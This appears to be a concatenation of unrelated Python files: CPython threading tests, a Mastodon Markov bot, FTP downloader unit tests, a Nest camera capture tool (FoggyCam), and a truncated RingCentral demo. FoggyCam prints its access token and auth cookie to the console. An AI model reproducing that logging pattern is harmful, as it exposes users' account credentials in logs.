                    assert rc == 0
                    print('end of worker thread')
                else:
                    # Child process should just return.
                    pass
            w = threading.Thread(target=worker)
            # Stub out the private condition variable's _release_save method.
            # This releases the condition's lock and flips the global that
            # causes the worker to fork. At this point, the problematic waiter
            # lock has been acquired once by the waiter and has been put onto
            # the waiters list.
            condition = w._block
            orig_release_save = condition._release_save
            def my_release_save():
                global start_fork
                orig_release_save()
                # Waiter lock held here, condition lock released.
                start_fork = True
            condition._release_save = my_release_save
            w.start()
            w.join()
            print('end of main thread')
            """
        output = "end of worker thread\nend of main thread\n"
        self.assertScriptHasOutput(script, output)
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_reinit_tls_after_fork(self):
        # Issue #13817: fork() would deadlock in a multithreaded program with
        # the ad-hoc TLS implementation.
        def do_fork_and_wait():
            # just fork a child process and wait it
            pid = os.fork()
            if pid > 0:
                os.waitpid(pid, 0)
            else:
                os._exit(0)
        # start a bunch of threads that will fork() child processes
        threads = []
        for i in range(16):
            t = threading.Thread(target=do_fork_and_wait)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
class ThreadingExceptionTests(BaseTestCase):
    """Check that misusing the threading API raises RuntimeError."""
    # A RuntimeError should be raised if Thread.start() is called
    # multiple times.
    def test_start_thread_again(self):
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, thread.start)
    def test_joining_current_thread(self):
        # A thread may not join itself (it would deadlock).
        # (Removed a stray trailing semicolon from the original.)
        current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
    def test_joining_inactive_thread(self):
        # join() before start() is an error.
        thread = threading.Thread()
        self.assertRaises(RuntimeError, thread.join)
    def test_daemonize_active_thread(self):
        # The daemon flag may only be set before the thread is started.
        thread = threading.Thread()
        thread.start()
        self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
    # Run the shared lock test suite against threading.Lock.
    locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
    # Run the shared reentrant-lock test suite against threading.RLock.
    locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
    # Run the shared event test suite against threading.Event.
    eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # A Condition uses an RLock by default and exports its API.
    locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
    # Run the shared condition-variable test suite against threading.Condition.
    condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
    # Run the shared semaphore test suite against threading.Semaphore.
    semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
    # Run the shared bounded-semaphore suite against threading.BoundedSemaphore.
    semtype = staticmethod(threading.BoundedSemaphore)
    # NOTE(review): test_recursion_limit has nothing to do with semaphores;
    # it appears to belong to ThreadingExceptionTests (its placement here
    # looks accidental) — confirm against upstream before moving it.
    @unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
    def test_recursion_limit(self):
        # Issue 9670
        # test that excessive recursion within a non-main thread causes
        # an exception rather than crashing the interpreter on platforms
        # like Mac OS X or FreeBSD which have small default stack sizes
        # for threads
        script = """if True:
            import threading
            def recurse():
                return recurse()
            def outer():
                try:
                    recurse()
                except RuntimeError:
                    pass
            w = threading.Thread(target=outer)
            w.start()
            w.join()
            print('end of main thread')
            """
        expected_output = "end of main thread\n"
        p = subprocess.Popen([sys.executable, "-c", script],
                             stdout=subprocess.PIPE)
        stdout, stderr = p.communicate()
        data = stdout.decode().replace('\r', '')
        self.assertEqual(p.returncode, 0, "Unexpected error")
        self.assertEqual(data, expected_output)
def test_main():
    """Run every test class defined in this module via test_support."""
    test.test_support.run_unittest(LockTests, RLockTests, EventTests,
                                   ConditionAsRLockTests, ConditionTests,
                                   SemaphoreTests, BoundedSemaphoreTests,
                                   ThreadTests,
                                   ThreadJoinOnShutdown,
                                   ThreadingExceptionTests,
                                   )
if __name__ == "__main__":
    test_main()
|
app.py | #!/usr/bin/env python3
import configparser
import time
import threading
import mastodonTool
import os
import datetime
import markovify
import exportModel
import re
# Load configuration (domain and API access tokens) from config.ini.
config_ini = configparser.ConfigParser()
config_ini.read('config.ini', encoding='utf-8')
def worker():
    """Train (at most once per day) a Markov model from the account's toots
    and post one generated sentence to Mastodon.

    Reads credentials from the module-level ``config_ini``; the model is
    cached as a JSON file under ./chainfiles.
    """
    # --- training -----------------------------------------------------
    domain = config_ini['read']['domain']
    read_access_token = config_ini['read']['access_token']
    write_access_token = config_ini['write']['access_token']
    account_info = mastodonTool.get_account_info(domain, read_access_token)
    params = {"exclude_replies": 1, "exclude_reblogs": 1}
    filename = "{}@{}".format(account_info["username"], domain)
    filepath = os.path.join("./chainfiles", os.path.basename(filename.lower()) + ".json")
    # Reuse the cached model if it is younger than 24 hours.
    if (os.path.isfile(filepath) and datetime.datetime.now().timestamp() - os.path.getmtime(filepath) < 60 * 60 * 24):
        print("モデルは再生成されません")
    else:
        exportModel.generateAndExport(mastodonTool.loadMastodonAPI(domain, read_access_token, account_info['id'], params), filepath)
        print("LOG,GENMODEL," + str(datetime.datetime.now()) + "," + account_info["username"].lower()) # Log
    # --- generation ---------------------------------------------------
    with open("./chainfiles/{}@{}.json".format(account_info["username"].lower(), domain)) as f:
        textModel = markovify.Text.from_json(f.read())
    sentence = textModel.make_sentence(tries=300)
    # make_sentence() returns None when it cannot build a sentence within
    # `tries` attempts; the original code then crashed on sentence.split().
    # Skip this round instead of raising AttributeError.
    if sentence is None:
        print("LOG,NOSENTENCE," + str(datetime.datetime.now()))
        return
    sentence = "".join(sentence.split()) + ' #bot'
    sentence = re.sub(r'(:.*?:)', r' \1 ', sentence)
    print(sentence)
    try:
        mastodonTool.post_toot(domain, write_access_token, {"status": sentence})
    except Exception as e:
        print("投稿エラー: {}".format(e))
def schedule(f, interval=1200, wait=True):
    """Run *f* on a fresh thread every *interval* seconds, forever.

    Args:
        f: zero-argument callable to execute.
        interval: period between runs, in seconds.
        wait: when true, join each run before sleeping, so a slow *f*
            never overlaps with the next invocation.
    """
    base_time = time.time()
    next_time = 0
    while True:
        runner = threading.Thread(target=f)
        runner.start()
        if wait:
            runner.join()
        # Sleep until the next multiple of *interval* past base_time; if the
        # remainder is exactly zero, wait a full interval instead.
        remainder = (base_time - time.time()) % interval
        next_time = remainder if remainder else interval
        time.sleep(next_time)
if __name__ == "__main__":
    # Periodic execution: run worker() forever on the default schedule.
    schedule(worker)
    # worker()  # uncomment to run a single iteration for debugging
|
test_ftp_file_download_manager.py | """ simple ftp tests """
# --------------------------------------------------
# Imports
# --------------------------------------------------
import filecmp
import os
import Queue
import shutil
import time
from threading import Thread
import ftplib
import unittest
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import MultiprocessFTPServer
from superftp.ftp_file_download_manager import FtpFileDownloader
# --------------------------------------------------
# Test Classes
# --------------------------------------------------
class TestFTPFileDownloadManager(unittest.TestCase):
    """ unit tests for ftp_file_download_manager

        Each test starts a throwaway pyftpdlib FTP server on port 2121
        rooted at a freshly generated test_data directory, runs the
        downloader against it and compares the results with the originals.
    """
    def __init__(self, *args, **kwargs):
        super(TestFTPFileDownloadManager, self).__init__(*args, **kwargs)
        self._ftp_thread = None        # thread running the embedded ftp server
        self._blocks_downloaded = 0    # counter used by the abort/resume tests
    def _start_ftp_server(self, ftp_root_dir, port=2121):
        """ start the test ftp server
            Args:
                ftp_root_dir - root directory for the ftp server
                port - port number for the ftp server
            Returns:
                thread running the ftp server
        """
        def tw_ftp_server():
            """ thread worker for the ftp server """
            authorizer = DummyAuthorizer()
            authorizer.add_user('user', '12345', ftp_root_dir, perm='elradfmwMT')
            # Instantiate FTP handler class
            handler = FTPHandler
            handler.authorizer = authorizer
            server = MultiprocessFTPServer(('', port), handler)
            server.max_cons = 256
            server.max_cons_per_ip = 10
            # serve until anything is posted on the communication queue
            while self._com_queue.empty():
                server.serve_forever(timeout=0.1, blocking=False)
            self._com_queue.get()
            server.close_all()
            time.sleep(1)
        # launch a thread with the ftp server
        t = Thread(target=tw_ftp_server, args=())
        t.start()
        return t
    def _stop_ftp_server(self):
        """ stop the test ftp server """
        self._com_queue.put('STOP')
    def setUp(self):
        """ start the test ftp server """
        # tearDown in case we had a previous failed test
        self.tearDown()
        # generate the test data
        self._com_queue = Queue.Queue()
        self._results_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                                         'results_ftp_file_download_manager')
        if not os.path.exists(self._results_dir):
            os.mkdir(self._results_dir)
        self._test_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'test_data')
        # guard the rmtree: the original unconditional rmtree raised OSError
        # on the very first run, when test_data does not exist yet
        if os.path.exists(self._test_dir):
            shutil.rmtree(self._test_dir)
        os.mkdir(self._test_dir)
        filepath = os.path.join(self._test_dir, 'testfile.txt')
        with open(filepath, 'w') as f:
            for i in range(0, 20):
                f.write(str(i) + '.' * (1024 * 1024) + '\n')
        os.mkdir(os.path.join(self._test_dir, 'a'))
        filepath = os.path.join(os.path.join(self._test_dir, 'a'), 'testfile2.txt')
        with open(filepath, 'w') as f:
            for i in range(0, 2):
                f.write(str(i) + '.' * (1024 * 1024) + '\n')
        self._ftp_thread = self._start_ftp_server(self._test_dir, 2121)
        # give the ftp server some time to start up
        time.sleep(1)
    def tearDown(self):
        """ stop the ftp server """
        if self._ftp_thread:
            self._stop_ftp_server()
            while self._ftp_thread.is_alive():
                time.sleep(0.01)
            self._ftp_thread = None
    @unittest.skip("not implemented")
    def test_chunk_download(self):
        """ test the download of a single chunk in a file comprised of many blocks """
        pass
    def test_file_download(self):
        """ test the download of a small simple file using download_file """
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=True)
        ftp.download_file('testfile.txt', self._results_dir)
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
    def test_directory_download(self):
        """ test the download of a directory using download_file """
        # clean up the results directory
        dir_path = os.path.join(self._results_dir, 'dir_test')
        if os.path.exists(dir_path):
            shutil.rmtree(dir_path)
        # download the directory
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=True)
        ftp.download('/', dir_path)
        # verify the sub directory was actually created
        self.assertTrue(os.path.exists(os.path.join(dir_path, 'a')))
        self.assertFalse(os.path.isfile(os.path.join(dir_path, 'a')))
        # verify the files were downloaded correctly
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(dir_path, 'testfile.txt'), shallow=False))
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'a/testfile2.txt'),
                                    os.path.join(dir_path, 'a/testfile2.txt'), shallow=False))
    def test_download(self):
        """ test the download of a small simple file using download"""
        if os.path.exists(os.path.join(self._results_dir, 'testfile.txt')):
            os.remove(os.path.join(self._results_dir, 'testfile.txt'))
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=False)
        ftp.download('testfile.txt', self._results_dir)
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
    def test_broken_tls(self):
        """ test correct response if server does not support tls """
        if os.path.exists(os.path.join(self._results_dir, 'testfile.txt')):
            os.remove(os.path.join(self._results_dir, 'testfile.txt'))
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=False, enable_tls=True)
        try:
            ftp.download('testfile.txt', self._results_dir)
        except ftplib.error_perm as e:
            # "except X as e" replaces the Python-2-only "except X, e" form;
            # behaviour is identical on Python 2.6+ and it parses on Python 3
            self.assertEqual(str(e), '500 Command "AUTH" not understood.')
    @unittest.skip("not implemented")
    def test_bad_server_address(self):
        """ test the handling of a bad server url """
        pass
    @unittest.skip("not implemented")
    def test_bad_credentials(self):
        """ test the handling of a bad server username password """
        pass
    @unittest.skip("not implemented")
    def test_bad_remote_path(self):
        """ test the handling of a bad remote path """
        pass
    @unittest.skip("not implemented")
    def test_bad_local_path(self):
        """ test the handling of a bad local path """
        pass
    @unittest.skip("not implemented")
    def test_local_path_is_directory(self):
        """ test the handling of local_path is a directory """
        pass
    def test_kill_speed(self):
        """ test that kill_speed does not crash """
        # kill_speed=0 disables the slow-connection killer; just verify a
        # plain download still completes correctly with it set
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=True)
        ftp.download('testfile.txt', self._results_dir)
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
    def test_resume_aborted_download(self):
        """ test the handling of resuming a previously aborted download """
        self._blocks_downloaded = 0
        def on_refresh_display(ftp_download_manager, blockmap, _remote_filepath):
            """ on refresh display handler """
            self._blocks_downloaded = self._blocks_downloaded + 1
            # make sure statistics do not crash
            blockmap.get_statistics()
            if self._blocks_downloaded > 2:
                ftp_download_manager.abort_download()
        # abort the download after 2 blocks have been downloaded
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=True)
        ftp.on_refresh_display = on_refresh_display
        ftp.download('testfile.txt', self._results_dir)
        self.assertFalse(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                     os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
        # resume the download
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=False)
        ftp.download('testfile.txt', self._results_dir)
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
    def test_resume_aborted_download2(self):
        """ test the handling of resuming a previously aborted download with a blocksize change"""
        self._blocks_downloaded = 0
        def on_refresh_display(ftp_download_manager, blockmap, _remote_filepath):
            """ on refresh display handler """
            self._blocks_downloaded = self._blocks_downloaded + 1
            # make sure statistics do not crash
            blockmap.get_statistics()
            if self._blocks_downloaded > 2:
                ftp_download_manager.abort_download()
        # abort the download after 2 blocks have been downloaded with a blocksize of 65536
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=65536, kill_speed=0, clean=True)
        ftp.on_refresh_display = on_refresh_display
        ftp.download('testfile.txt', self._results_dir)
        self.assertFalse(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                     os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
        # resume the download
        ftp = FtpFileDownloader(server_url='localhost', username='user', password='12345', port=2121,
                                concurrent_connections=4, min_blocks_per_segment=1, max_blocks_per_segment=2,
                                initial_blocksize=1048576, kill_speed=0, clean=False)
        ftp.download('testfile.txt', self._results_dir)
        self.assertTrue(filecmp.cmp(os.path.join(self._test_dir, 'testfile.txt'),
                                    os.path.join(self._results_dir, 'testfile.txt'), shallow=False))
|
foggycam.py | """FoggyCam captures Nest camera images and generates a video."""
from urllib.request import urlopen
import pickle
import urllib
import json
from http.cookiejar import CookieJar
import os
from collections import defaultdict
import traceback
from subprocess import Popen, PIPE
import uuid
import threading
import time
from datetime import datetime
import subprocess
from azurestorageprovider import AzureStorageProvider
import shutil
class FoggyCam(object):
    """FoggyCam client class that performs capture operations.

    Authenticates against the Nest web API (with optional 2FA), discovers the
    user's cameras, then captures still images per camera and optionally
    compiles them into videos with ffmpeg.
    """

    # NOTE(review): everything below is a *class* attribute. The mutable ones
    # (nest_user_request_payload, nest_camera_array) are shared across all
    # instances of FoggyCam — harmless for this single-instance script, but a
    # latent aliasing bug if more than one client is ever created.
    nest_username = ''
    nest_password = ''
    nest_user_id = ''
    nest_access_token = ''
    nest_access_token_expiration = ''
    nest_current_user = None

    # Nest web API endpoints; #PLACEHOLDER# tokens are substituted at call time.
    nest_session_url = 'https://home.nest.com/session'
    nest_user_url = 'https://home.nest.com/api/0.1/user/#USERID#/app_launch'
    nest_api_login_url = 'https://webapi.camera.home.nest.com/api/v1/login.login_nest'
    nest_image_url = 'https://nexusapi-us1.camera.home.nest.com/get_image?uuid=#CAMERAID#&width=#WIDTH#&cachebuster=#CBUSTER#'
    nest_verify_pin_url = 'https://home.nest.com/api/0.1/2fa/verify_pin'

    # Request body used to enumerate camera ("quartz") buckets for the user.
    nest_user_request_payload = {
        "known_bucket_types":["quartz"],
        "known_bucket_versions":[]
    }

    # Camera UUIDs discovered by initialize_user().
    nest_camera_array = []
    # Number of images buffered before a video is compiled (overridden from config).
    nest_camera_buffer_threshold = 50

    is_capturing = False
    cookie_jar = None
    # Cookie-aware urllib opener built in __init__.
    merlin = None
    temp_dir_path = ''
    local_path = ''

    def __init__(self, username, password):
        """Store credentials, build the cookie-aware opener, and try to re-use
        pickled cookies before falling back to a full login."""
        self.nest_password = password
        self.nest_username = username
        self.cookie_jar = CookieJar()
        self.merlin = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cookie_jar))
        if not os.path.exists('_temp'):
            os.makedirs('_temp')
        self.local_path = os.path.dirname(os.path.abspath(__file__))
        self.temp_dir_path = os.path.join(self.local_path, '_temp')
        # It's important to try and load the cookies first to check
        # if we can avoid logging in.
        try:
            self.unpickle_cookies()
            utc_date = datetime.utcnow()
            utc_millis_str = str(int(utc_date.timestamp())*1000)
            self.initialize_twof_session(utc_millis_str)
        except:
            # NOTE(review): bare except — any failure (including programming
            # errors) silently falls through to a full re-login.
            print ("Failed to re-use the cookies. Re-initializing session...")
            self.initialize_session()
            self.login()
            self.initialize_user()

    def unpickle_cookies(self):
        """Get local cookies and load them into the cookie jar.

        Raises if cookies.bin is missing/corrupt or has no cztoken cookie,
        which the caller treats as "re-login required".
        """
        print ("Unpickling cookies...")
        with open("cookies.bin", 'rb') as f:
            pickled_cookies = pickle.load(f)
            for pickled_cookie in pickled_cookies:
                self.cookie_jar.set_cookie(pickled_cookie)
            cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
            # cztoken doubles as the Nest access token.
            self.nest_access_token = cookie_data["cztoken"]

    def pickle_cookies(self):
        """Store the cookies locally to reduce auth calls."""
        print ("Pickling cookies...")
        pickle.dump([c for c in self.cookie_jar], open("cookies.bin", "wb"))

    def initialize_twof_session(self, time_token):
        """Creates the first session to get the access token and cookie, with 2FA enabled.

        time_token: millisecond-timestamp string appended as a cache buster.
        """
        print ("Intializing 2FA session...")
        target_url = self.nest_session_url + "?=_" + time_token
        print (target_url)
        try:
            request = urllib.request.Request(target_url)
            request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
            response = self.merlin.open(request)
            session_data = response.read()
            session_json = json.loads(session_data)
            self.nest_access_token = session_json['access_token']
            self.nest_access_token_expiration = session_json['expires_in']
            self.nest_user_id = session_json['userid']
            # Persist the refreshed cookies for next run.
            self.pickle_cookies()
        except urllib.request.HTTPError as err:
            print (err)

    def initialize_session(self):
        """Creates the first session to get the access token and cookie.

        On a 401 with status "verification_pending", drives the interactive
        2FA PIN flow and then re-initializes via initialize_twof_session().
        """
        print ('INFO: Initializing session...')
        payload = {'email':self.nest_username, 'password':self.nest_password}
        binary_data = json.dumps(payload).encode('utf-8')
        request = urllib.request.Request(self.nest_session_url, binary_data)
        request.add_header('Content-Type', 'application/json')
        try:
            response = self.merlin.open(request)
            session_data = response.read()
            session_json = json.loads(session_data)
            self.nest_access_token = session_json['access_token']
            self.nest_access_token_expiration = session_json['expires_in']
            self.nest_user_id = session_json['userid']
            print ('INFO: [PARSED] Captured authentication token:')
            print (self.nest_access_token)
            print ('INFO: [PARSED] Captured expiration date for token:')
            print (self.nest_access_token_expiration)
            cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
            for cookie in cookie_data:
                print (cookie)
            print ('INFO: [COOKIE] Captured authentication token:')
            print (cookie_data["cztoken"])
        except urllib.request.HTTPError as err:
            if err.code == 401:
                error_message = err.read()
                unauth_content = json.loads(error_message)
                if unauth_content["status"].lower() == "verification_pending":
                    print ("Pending 2FA verification!")
                    two_factor_token = unauth_content["2fa_token"]
                    phone_truncated = unauth_content["truncated_phone_number"]
                    print ("Enter PIN you just received on number ending with", phone_truncated)
                    # Interactive: blocks until the user types the SMS PIN.
                    pin = input()
                    payload = {"pin":pin ,"2fa_token":two_factor_token}
                    binary_data = json.dumps(payload).encode('utf-8')
                    request = urllib.request.Request(self.nest_verify_pin_url, binary_data)
                    request.add_header('Content-Type', 'application/json')
                    try:
                        response = self.merlin.open(request)
                        pin_attempt = response.read()
                        parsed_pin_attempt = json.loads(pin_attempt)
                        if parsed_pin_attempt["status"].lower() == "id_match_positive":
                            print ("2FA verification successful.")
                            utc_date = datetime.utcnow()
                            utc_millis_str = str(int(utc_date.timestamp())*1000)
                            print ("Targetting new session with timestamp: ", utc_millis_str)
                            cookie_data = dict((cookie.name, cookie.value) for cookie in self.cookie_jar)
                            print ('INFO: [COOKIE] Captured authentication token:')
                            print (cookie_data["cztoken"])
                            self.nest_access_token = parsed_pin_attempt['access_token']
                            self.initialize_twof_session(utc_millis_str)
                        else:
                            print ("Could not verify. Exiting...")
                            exit()
                    except:
                        # NOTE(review): bare except; also exit() aborts the
                        # whole process from library code.
                        traceback.print_exc()
                        print ("Failed 2FA checks. Exiting...")
                        exit()
        print ('INFO: Session initialization complete!')

    def login(self):
        """Performs user login to get the website_2 cookie."""
        print ('INFO: Performing user login...')
        post_data = {'access_token':self.nest_access_token}
        post_data = urllib.parse.urlencode(post_data)
        binary_data = post_data.encode('utf-8')
        print ("INFO: Auth post data")
        print (post_data)
        request = urllib.request.Request(self.nest_api_login_url, data=binary_data)
        request.add_header('Content-Type', 'application/x-www-form-urlencoded')
        response = self.merlin.open(request)
        session_data = response.read()
        print (session_data)

    def initialize_user(self):
        """Gets the assets belonging to Nest user.

        Fills nest_camera_array with the UUID of every "quartz." (camera)
        bucket found in the app_launch response.
        """
        print ('INFO: Initializing current user...')
        user_url = self.nest_user_url.replace('#USERID#', self.nest_user_id)
        print ('INFO: Requesting user data from:')
        print (user_url)
        binary_data = json.dumps(self.nest_user_request_payload).encode('utf-8')
        request = urllib.request.Request(user_url, binary_data)
        request.add_header('Content-Type', 'application/json')
        request.add_header('Authorization', 'Basic %s' % self.nest_access_token)
        response = self.merlin.open(request)
        response_data = response.read()
        print (response_data)
        user_object = json.loads(response_data)
        for bucket in user_object['updated_buckets']:
            bucket_id = bucket['object_key']
            if bucket_id.startswith('quartz.'):
                camera_id = bucket_id.replace('quartz.', '')
                print ('INFO: Detected camera configuration.')
                print (bucket)
                print ('INFO: Camera UUID:')
                print (camera_id)
                self.nest_camera_array.append(camera_id)

    def capture_images(self, config=None):
        """Starts the multi-threaded image capture process.

        Spawns one daemon thread per camera running perform_capture(), then
        blocks forever; killing the process stops all capture threads.
        """
        print ('INFO: Capturing images...')
        self.is_capturing = True
        if not os.path.exists('capture'):
            os.makedirs('capture')
        self.nest_camera_buffer_threshold = config.threshold
        for camera in self.nest_camera_array:
            camera_path = ''
            video_path = ''
            # Determine whether the entries should be copied to a custom path
            # or not.
            if not config.path:
                camera_path = os.path.join(self.local_path, 'capture', camera, 'images')
                video_path = os.path.join(self.local_path, 'capture', camera, 'video')
            else:
                camera_path = os.path.join(config.path, 'capture', camera, 'images')
                video_path = os.path.join(config.path, 'capture', camera, 'video')
            # Provision the necessary folders for images and videos.
            if not os.path.exists(camera_path):
                os.makedirs(camera_path)
            if not os.path.exists(video_path):
                os.makedirs(video_path)
            image_thread = threading.Thread(target=self.perform_capture, args=(config, camera, camera_path, video_path))
            image_thread.daemon = True
            image_thread.start()
        # Keep the main thread alive so the daemon capture threads keep running.
        while True:
            time.sleep(1)

    def perform_capture(self, config=None, camera=None, camera_path='', video_path=''):
        """Captures images and generates the video from them.

        Runs in its own thread per camera: fetches one still roughly every
        5 seconds, buffers file ids, and when the buffer reaches the
        threshold compiles the batch into an mp4 via ffmpeg (optionally
        uploading to Azure and deleting the source images).
        """
        camera_buffer = defaultdict(list)
        while self.is_capturing:
            file_id = str(uuid.uuid4().hex)
            utc_date = datetime.utcnow()
            # Millisecond timestamp used to defeat CDN/browser caching.
            utc_millis_str = str(int(utc_date.timestamp())*1000)
            print ('Applied cache buster: ', utc_millis_str)
            image_url = self.nest_image_url.replace('#CAMERAID#', camera).replace('#CBUSTER#', utc_millis_str).replace('#WIDTH#', str(config.width))
            request = urllib.request.Request(image_url)
            # Browser-like headers; the Nest endpoint serves images to these.
            request.add_header('accept', 'image/webp,image/apng,image/*,*/*;q=0.9')
            request.add_header('accept-encoding', 'gzip, deflate, br')
            request.add_header('user-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36')
            request.add_header('referer','https://home.nest.com/')
            request.add_header('authority','nexusapi-us1.camera.home.nest.com')
            try:
                response = self.merlin.open(request)
                # Throttle: one image roughly every 5 seconds.
                time.sleep(5)
                with open(camera_path + '/' + file_id + '.jpg', 'wb') as image_file:
                    for chunk in response:
                        image_file.write(chunk)
                # Check if we need to compile a video
                if config.produce_video:
                    camera_buffer_size = len(camera_buffer[camera])
                    print ('[', threading.current_thread().name, '] INFO: Camera buffer size for ', camera, ': ', camera_buffer_size)
                    if camera_buffer_size < self.nest_camera_buffer_threshold:
                        camera_buffer[camera].append(file_id)
                    else:
                        camera_image_folder = os.path.join(self.local_path, camera_path)
                        # Build the batch of files that need to be made into a video.
                        file_declaration = ''
                        for buffer_entry in camera_buffer[camera]:
                            file_declaration = file_declaration + 'file \'' + camera_image_folder + '/' + buffer_entry + '.jpg\'\n'
                        # ffmpeg concat demuxer input list, one per camera.
                        concat_file_name = os.path.join(self.temp_dir_path, camera + '.txt')
                        # Make sure that the content is decoded
                        with open(concat_file_name, 'w') as declaration_file:
                            declaration_file.write(file_declaration)
                        # Check if we have ffmpeg locally
                        use_terminal = False
                        ffmpeg_path = ''
                        if shutil.which("ffmpeg"):
                            # ffmpeg is on PATH.
                            ffmpeg_path = 'ffmpeg'
                            use_terminal = True
                        else:
                            # Fall back to a bundled binary under ../tools/ffmpeg.
                            ffmpeg_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'tools', 'ffmpeg'))
                        if use_terminal or (os.path.isfile(ffmpeg_path) and use_terminal is False):
                            print ('INFO: Found ffmpeg. Processing video!')
                            target_video_path = os.path.join(video_path, file_id + '.mp4')
                            process = Popen([ffmpeg_path, '-r', str(config.frame_rate), '-f', 'concat', '-safe', '0', '-i', concat_file_name, '-vcodec', 'libx264', '-crf', '25', '-pix_fmt', 'yuv420p', target_video_path], stdout=PIPE, stderr=PIPE)
                            process.communicate()
                            os.remove(concat_file_name)
                            print ('INFO: Video processing is complete!')
                            # Upload the video
                            storage_provider = AzureStorageProvider()
                            if bool(config.upload_to_azure):
                                print ('INFO: Uploading to Azure Storage...')
                                target_blob = 'foggycam/' + camera + '/' + file_id + '.mp4'
                                storage_provider.upload_video(account_name=config.az_account_name, sas_token=config.az_sas_token, container='foggycam', blob=target_blob, path=target_video_path)
                                print ('INFO: Upload complete.')
                            # If the user specified the need to remove images post-processing
                            # then clear the image folder from images in the buffer.
                            if config.clear_images:
                                for buffer_entry in camera_buffer[camera]:
                                    deletion_target = os.path.join(camera_path, buffer_entry + '.jpg')
                                    print ('INFO: Deleting ' + deletion_target)
                                    os.remove(deletion_target)
                        else:
                            print ('WARNING: No ffmpeg detected. Make sure the binary is in /tools.')
                        # Empty buffer, since we no longer need the file records that we're planning
                        # to compile in a video.
                        camera_buffer[camera] = []
            except urllib.request.HTTPError as err:
                # 403 means the session expired — re-authenticate and continue.
                if err.code == 403:
                    self.initialize_session()
                    self.login()
                    self.initialize_user()
            except Exception:
                # Log-and-continue: a single failed frame must not kill the thread.
                print ('ERROR: Could not download image from URL:')
                print (image_url)
                traceback.print_exc()
|
demo_subscription.py | #!/usr/bin/env python
# encoding: utf-8
from multiprocessing import Process
from time import sleep
from ringcentral.subscription import Events
from ringcentral import SDK
from config import USERNAME, EXTENSION, PASSWORD, APP_KEY, APP_SECRET, SERVER
def main():
    """Log in to RingCentral and listen for message-store notifications
    in a child process."""
    sdk = SDK(APP_KEY, APP_SECRET, SERVER)
    platform = sdk.platform()
    platform.login(USERNAME, EXTENSION, PASSWORD)

    def handle_notification(msg):
        # Dump every incoming notification as-is.
        print(msg)

    def run_listener():
        # Subscribe to the extension's message store and idle until Ctrl+C.
        try:
            subscription = sdk.create_subscription()
            subscription.add_events(['/account/~/extension/~/message-store'])
            subscription.on(Events.notification, handle_notification)
            subscription.register()
            while True:
                sleep(0.1)
        except KeyboardInterrupt:
            print("Pubnub listener stopped...")

